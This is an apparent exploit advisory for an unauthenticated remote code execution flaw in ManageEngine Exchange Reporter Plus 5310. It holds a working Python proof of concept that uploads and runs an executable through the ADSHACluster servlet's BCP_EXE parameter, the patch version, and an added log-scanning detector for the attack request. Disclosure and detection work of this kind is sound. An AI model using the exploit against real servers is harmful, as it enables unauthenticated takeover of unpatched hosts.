ManageEngine Exchange Reporter Plus 5310 Remote Code Execution
Source: https://security.szurek.pl  Author: Szurek  Published: 2018-07-04
# Exploit Title: ManageEngine Exchange Reporter Plus <= 5310 Unauthenticated RCE
# Date: 28-06-2018
# Software Link: https://www.manageengine.com/products/exchange-reports/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# YouTube: https://www.youtube.com/c/KacperSzurek
# Category: remote
 
1. Description
  
The Java servlet `ADSHACluster` executes a `bcp.exe` file, which can be passed in using the `BCP_EXE` parameter.

https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html
  
2. Proof of Concept

```python
import urllib

file_to_execute = "calc.exe"
ip = "192.168.1.105" 

def to_hex(s):
    lst = []
    for ch in s:
        hv = hex(ord(ch)).replace('0x', '')
        if len(hv) == 1:
            hv = '0'+hv
        lst.append(hv)
    
    return reduce(lambda x,y:x+y, lst)

print "ManageEngine Exchange Reporter Plus <= 5310"
print "Unauthenticated Remote Code Execution"
print "by Kacper Szurek"
print "https://security.szurek.pl/"
print "https://twitter.com/KacperSzurek"
print "https://www.youtube.com/c/KacperSzurek"

params = urllib.urlencode({'MTCALL': "nativeClient", "BCP_RLL" : "0102", 'BCP_EXE': to_hex(open(file_to_execute, "rb").read())})
f = urllib.urlopen("http://{}:8181/exchange/servlet/ADSHACluster".format(ip), params)
if '{"STATUS":"error"}' in f.read():
    print "OK"
else:
    print "ERROR"
```

3. Solution:
   
Update to version 5311
https://www.manageengine.com/products/exchange-reports/release-notes.html
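
For hosts that cannot be updated immediately, or for a retrospective log review, the request shape in the proof of concept can be turned into a detection check. The following is an added example, not part of the original advisory: it assumes a proxy or WAF log that records request bodies, and the record layout, function names and sample records are hypothetical.

```python
from urllib.parse import urlsplit, parse_qs

# Path and parameter name are taken from the proof of concept above.
SERVLET_PATH = "/exchange/servlet/ADSHACluster"
PAYLOAD_PARAM = "BCP_EXE"


def classify_request(method, url, body=""):
    """Return a list of findings for one logged HTTP request (empty if benign)."""
    parts = urlsplit(url)
    # Drop any ";jsessionid=..." style path parameters before comparing.
    path = parts.path.split(";", 1)[0].rstrip("/")
    if path != SERVLET_PATH:
        return []
    findings = ["%s to ADSHACluster servlet" % method.upper()]
    # The parameter may arrive in the query string or a form-encoded body.
    params = parse_qs(parts.query, keep_blank_values=True)
    for name, values in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(name, []).extend(values)
    for value in params.get(PAYLOAD_PARAM, []):
        findings.append("%s present, %d chars" % (PAYLOAD_PARAM, len(value)))
        try:
            head = bytes.fromhex(value[:4])  # first two bytes of the hex payload
        except ValueError:
            head = b""
        if head == b"MZ":  # DOS/PE header of a Windows executable
            findings.append("%s decodes to an MZ executable image" % PAYLOAD_PARAM)
    return findings


def scan(records):
    """records: iterable of (source_ip, method, url, body) tuples (assumed layout)."""
    hits = []
    for src, method, url, body in records:
        findings = classify_request(method, url, body)
        if findings:
            hits.append((src, findings))
    return hits


# Constructed sample records (hypothetical log layout, documentation IP ranges).
SAMPLE = [
    ("198.51.100.7", "GET", "/exchange/index.jsp", ""),
    ("198.51.100.7", "POST", "/exchange/servlet/ADSHACluster",
     "MTCALL=nativeClient&BCP_RLL=0102&BCP_EXE=4d5a90000300"),
    ("192.0.2.20", "POST", "/exchange/servlet/ADSHACluster", "MTCALL=nativeClient"),
]

if __name__ == "__main__":
    for src, findings in scan(SAMPLE):
        print(src, "; ".join(findings))
```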

 